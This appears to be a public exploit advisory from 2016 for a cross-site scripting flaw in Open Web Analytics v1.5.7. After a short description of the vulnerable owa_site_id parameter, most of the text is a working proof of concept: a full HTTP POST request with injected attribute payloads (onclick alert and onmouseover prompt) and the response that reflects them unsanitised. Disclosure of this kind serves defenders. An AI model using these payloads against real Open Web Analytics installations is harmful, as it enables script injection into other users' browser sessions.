Exploit Title: Open Web Analytics v1.5.7 Cross-Site Scripting
Author: 1N3 @CrowdShield https://crowdshield.com
Vendor: http://www.openwebanalytics.com/
Date: 02/24/2016
Description:
Open Web Analytics suffers from a Cross-Site Scripting vulnerability in the owa_site_id parameter because it fails to sanitize input before rendering the content to the user. The vulnerability can be triggered by hitting the ALT+SHIFT+X key after the payload is injected.
Request:
POST /install.php?owa_site_id=1"/accesskey="X"/onclick="alert(1)"><!--%20&owa_do=base.installDefaultsEntry& HTTP/1.1
Host: web.kiwi.ki
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://web.kiwi.ki/install.php?owa_site_id=&owa_do=base.installDefaultsEntry&
Cookie: owa_v=cdh%3D%3Ea2fc6dac%7C%7C%7Cvid%3D%3E1456351264222521405%7C%7C%7Cfsts%3D%3E1456351264%7C%7C%7Cdsfs%3D%3E0%7C%7C%7Cnps%3D%3E1; owa_s=cdh%3D%3Ea2fc6dac%7C%7C%7Clast_req%3D%3E1456351264%7C%7C%7Csid%3D%3E1456351264683274933%7C%7C%7Cdsps%3D%3E0%7C%7C%7Creferer%3D%3E%28none%29%7C%7C%7Cmedium%3D%3Edirect%7C%7C%7Csource%3D%3E%28none%29%7C%7C%7Csearch_terms%3D%3E%28none%29
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
owa_protocol=http%3A%2F%2F&owa_domain=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_email_address=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_password=127%22+onmouseover%3Dprompt%28901496%29+bad%3D%22&owa_nonce=4076e70a50&owa_action=base.installBase&owa_save_button=Continue...
Response:
<input size="70" name="owa_go" value="https://web.kiwi.ki/install.php?owa_site_id=1" accesskey="X" onclick="alert(1)" type="hidden"><!--%20&owa_do=base.installDefaultsEntry&">